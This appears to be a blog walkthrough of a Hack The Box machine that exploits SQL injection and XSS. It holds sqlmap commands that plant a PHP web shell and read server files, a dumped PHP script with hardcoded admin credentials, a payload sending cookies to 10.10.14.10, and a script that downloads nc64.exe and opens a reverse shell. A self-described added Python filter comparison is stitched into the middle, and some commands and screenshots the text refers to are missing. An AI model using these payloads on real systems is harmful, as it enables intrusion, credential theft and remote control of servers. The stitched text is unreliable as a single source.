Several months have passed without any new security publications. I am hoping to unveil my current research, which I have labelled “The Untold SQLi Attack.” I would like to show a few different ways of exploiting the popular vulnerability known as SQL injection. According to OWASP, SQL injection is the crafting of malicious SQL queries through the input data sent from the client to the application. A successful SQL injection (SQLi) can read, insert, update and delete data, execute administration operations on the database, recover the content of a given file present on the DBMS file system and, in some cases, issue commands to the operating system.
Without further ado, let’s get started.
Testing for SQLi:
The above commands and methodology are what most of us are familiar with. When the database server and the web server run on the same system and share the same underlying file system, an SQL injection combined with sufficient conditions (file system permissions, DB privileges) lets us upload a backdoor shell or read/download server configuration files whose locations are generally predefined. Are there more ways of exploitation? The answer is yes. Let’s see it.
You can see that the user has the FILE privilege, as illustrated in the above screenshot, and we can use it to read/write files from the injection if the file system permissions allow this. MySQL performs the file access as its own OS user account, so that account’s permissions, not the web server’s, decide what can be read or written.
Great, we have shell access to the server. Please note: this demonstration took place on a Windows machine. On a Linux machine some commands and paths may vary.
File Write
root@kali:~/htb/# cat s2.php
<?php echo shell_exec($_GET["cmd"]); ?>
root@kali:~/htb/# sqlmap -r req2 --dbms mysql --file-write=s2.php --file-dest="C:/Inetpub/wwwroot/s2.php"
File Read
root@kali:~/htb/# sqlmap -r req2 --dbms mysql --file-read="C:/xampp/htdocs/admin/backdoorchecker.php"
root@kali:~/.sqlmap/output/10.10.x.x/files# cat C__xampp_htdocs_admin_backdoorchecker.php
<?php
include('../link.php');
include('auth.php');
$username = base64_decode(urldecode($_COOKIE['username']));
$password = base64_decode(urldecode($_COOKIE['password']));
$bad = array('$(','&');
$good = "ls";
if(strtolower(substr(PHP_OS,0,3)) == "win"){
    $good = "dir";
}
if($username == "admin" && $password == "Hopelessromantic"){
    if(isset($_POST['cmd'])){
        // FILTER ESCAPE CHARS
        foreach($bad as $char){
            if(strpos($_POST['cmd'],$char) !== false){
                die("You're not allowed to do that.");
            }
        }
        // CHECK IF THE FIRST 2 CHARS ARE LS
        if(substr($_POST['cmd'], 0,strlen($good)) != $good){
            die("It's only allowed to use the $good command");
        }
        if($_SERVER['REMOTE_ADDR'] == "::1"){
            system($_POST['cmd']);
        } else{
            echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
        }
    }
} else{
    echo "You are not allowed to use this function!";
}
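The checker dumped above only rejects the substrings `$(` and `&` and then accepts anything whose first characters equal `dir` (or `ls`), so every other shell operator still reaches system(). As an added illustration that is not part of the original post or of the target application, the Python below models that blocklist/prefix check next to an exact-match allowlist and runs both over a few constructed inputs; the sample commands and the hardened rule are my own, not the page’s.

```python
import re

# Blocklist and prefix check as in the dumped backdoorchecker.php
BAD_SUBSTRINGS = ("$(", "&")

# Hardened alternative: the only commands ever passed on, matched exactly
ALLOWED_COMMANDS = {"dir", "ls"}
SHELL_METACHARS = re.compile(r"[|;&`$<>(){}\n\r]")


def weak_filter(cmd: str, good: str = "dir") -> bool:
    """Model of the page's checker: reject if a blocklisted substring is
    present, otherwise accept anything whose first characters equal `good`.
    Returns True when the command would reach system()."""
    if any(bad in cmd for bad in BAD_SUBSTRINGS):
        return False
    return cmd[: len(good)] == good


def strict_filter(cmd: str) -> bool:
    """Hardened check: no shell metacharacters at all, and the whole
    (stripped) string must equal an allowlisted command. Arguments are
    deliberately not accepted, so nothing user-controlled reaches a shell."""
    if SHELL_METACHARS.search(cmd):
        return False
    return cmd.strip() in ALLOWED_COMMANDS


def compare(samples):
    """Return {command: (weak_accepts, strict_accepts)} for each sample."""
    return {s: (weak_filter(s), strict_filter(s)) for s in samples}


# Constructed sample inputs; the pipe and semicolon cases are the shapes
# the blocklist on the page does not cover.
SAMPLES = [
    "dir",
    "dir /w",
    "dir| whoami",
    "dir && whoami",
    "dir $(whoami)",
    "dir; whoami",
    "whoami",
]

if __name__ == "__main__":
    for cmd, (weak, strict) in compare(SAMPLES).items():
        print(f"{cmd!r:18} prefix/blocklist={weak!s:5} allowlist={strict}")
```

The REMOTE_ADDR check in the original offers no extra protection here, because a request issued by a browser on the server itself (which is what the XSS below triggers) arrives from localhost.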
Working XSS scripts
<script> <img src=x onerror=this.src='http://10.10.14.10:8000/?c='+document.cookie></script>
root@kali:~/htb/# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.154 - - [29/Jan/2020 03:24:29] code 404, message File not found
10.10.10.154 - - [29/Jan/2020 03:24:29] "GET /bogus.php?output=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -
<script type="text/javascript">
var Http = new XMLHttpRequest();
var url = '/admin/backdoorchecker.php';
var params = 'cmd=dir| powershell -c "iwr -uri http://10.10.14.10:8000/nc64.exe -outfile %temp%\a.exe";%temp%\a.exe -e cmd.exe 10.10.14.10 1111';
Http.open("POST", url, true);
Http.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
Http.send(params);
</script>
Author: IG: that_faceless_coder
#TeamInveteck